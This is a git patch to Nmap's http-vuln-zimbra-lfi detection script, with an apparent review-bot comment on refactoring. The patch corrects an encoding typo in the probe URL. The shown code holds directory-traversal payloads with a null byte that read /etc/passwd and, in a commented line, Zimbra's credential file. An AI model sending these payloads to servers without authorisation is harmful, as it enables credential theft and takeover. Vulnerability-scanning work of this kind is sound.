From bf269866859558fee71fb3fab839fd58189e136b Mon Sep 17 00:00:00 2001
From: dmiller
Date: Fri, 7 Feb 2014 15:54:12 +0000
Subject: [PATCH] Patch from Paul AMAR to fix http-vuln-zimbra-lfi
http://seclists.org/nmap-dev/2014/q1/130
---
 scripts/http-vuln-zimbra-lfi.nse | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/scripts/http-vuln-zimbra-lfi.nse b/scripts/http-vuln-zimbra-lfi.nse
index 31c061cef..ca7b3127d 100644
--- a/scripts/http-vuln-zimbra-lfi.nse
+++ b/scripts/http-vuln-zimbra-lfi.nse
@@ -66,7 +66,7 @@ action = function(host, port)
 state = vulns.STATE.NOT_VULN, -- default
 description = [[
 This script exploits a Local File Inclusion in
-/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx20TemplateMsg.js.zgz
+/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz
 which allows us to see any file on the filesystem, including config files that contain LDAP root credentials, allowing us to make requests in /service/admin/soap API with the stolen LDAP credentials to create user
@@ -87,8 +87,8 @@ This issue was patched in Zimbra 7.2.6.
 local file_long = "../../../../../../../../../etc/passwd"
 --local file_long = "../../../../../../../../../opt/zimbra/conf/localconfig.xml"
- local url_short = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_short .. "%00"
- local url_long = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_long .. "%00"
+ local url_short = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_short .. "%00"
+ local url_long = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_long .. "%00"
 stdnse.print_debug(1, "Trying to detect if the server is vulnerable")
 stdnse.print_debug(1, "GET " .. uri .. escape(url_short))
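Review bot: The resource path is still spelled out in full on both `url_short` and `url_long` in the second hunk, and a third time in the description text of the first hunk, so the same typo this patch corrects can reappear in one copy without the others. Holding the shared prefix (path plus the `?v=...&skin=` query) in one local, here called `res_path`, and writing `local url_short = res_path .. file_short .. "%00"` and `local url_long = res_path .. file_long .. "%00"` keeps the two probes identical by construction. Because the report state defaults to `vulns.STATE.NOT_VULN`, a malformed probe path is reported as a clean host rather than as a failed check. The code that sets the state is outside these hunks, so it is worth confirming there that an unexpected response (for example a 404 on the resource itself) is not treated as a negative result. The `action` function begins and ends outside both hunks.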